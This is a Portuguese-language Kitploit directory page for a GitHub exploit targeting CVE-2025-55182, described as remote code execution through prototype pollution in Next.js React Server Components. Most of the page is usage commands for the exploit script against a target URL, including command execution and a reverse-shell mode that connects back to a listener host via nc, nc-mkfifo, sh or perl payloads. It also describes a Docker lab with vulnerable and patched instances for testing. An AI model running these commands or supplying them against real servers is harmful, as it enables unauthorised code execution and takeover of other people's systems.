Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Exploit para CVE-2025-55182 que permite execução remota de código via poluição de protótipo em Next.js React Server Components, com capacidades de execução de comandos e shell reversa. | Kitploit
Ferramentas/GitHubGitHub/mr-destroyer/cve-2025-55182
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de PayloadsLabs e Prática
GitHubmr-destroyer/cve-2025-55182

CVE-2025-55182

Exploit para CVE-2025-55182 que permite execução remota de código via poluição de protótipo em Next.js React Server Components, com capacidades de execução de comandos e shell reversa.

Ver Repositório
há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de RCE em React Server Components do Next.js

Explora a CVE-2025-55182 para execução remota de código via poluição de protótipo.

Instalação

root@kitploit:~
uv sync

Uso

Execução de Comandos

root@kitploit:~
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

Shell Reverso

root@kitploit:~
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

Opções

  • -u, --url: URL/host para verificar (obrigatório)
  • -c, --cmd: Comando a executar
  • -r, --reverse: Ativa o modo de shell reverso
  • -l, --lhost: Host do listener para o shell reverso
  • -p, --lport: Porta do listener para o shell reverso
  • -P, --payload: Tipo de payload do shell reverso: nc, nc-mkfifo, sh, perl (padrão: nc)
  • --timeout: Tempo limite de requisição em segundos (padrão: 10)
  • Exemplos

    root@kitploit:~
    # Execute command
    python3 exploit.py -u https://example.com -c "whoami"
    
    # Reverse shell with nc-mkfifo (recommended for Alpine)
    python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
    

    Ambiente de Laboratório

    O diretório lab/ contém uma configuração Docker completa para testar o exploit.

    Configuração

    root@kitploit:~
    cd lab
    docker-compose up -d
    

    Isso iniciará dois serviços:

    • vulnerable: Aplicação Next.js vulnerável na porta 3011
    • patched: Aplicação Next.js corrigida na porta 3012

    Testando

    root@kitploit:~
    # Test on vulnerable instance
    python3 exploit.py -u http://localhost:3011 -c "id"
    
    # Test reverse shell (get gateway IP first)
    GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
    python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
    
    Baixar ferramenta